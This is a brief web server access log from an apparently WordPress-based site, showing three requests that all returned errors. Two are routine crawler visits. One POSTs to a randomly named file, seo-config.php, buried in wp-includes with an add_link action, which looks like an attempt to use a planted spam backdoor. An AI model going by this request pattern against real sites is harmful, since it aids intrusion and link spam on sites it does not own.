74.7.241.19 - - [31/Aug/2026:08:42:22 -0400] "GET /?v=a2b6i0o8g4e3n5y42 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
179.43.146.218 - - [31/Aug/2026:08:42:26 -0400] "POST /wp-includes/Text/gmkxf1o/toqzuer/hyrqmbo/seo-config.php?action=add_link HTTP/1.1" 500 - "https://cfntoronto.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
65.109.118.212 - - [31/Aug/2026:08:37:28 -0400] "GET /?o=207028662 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
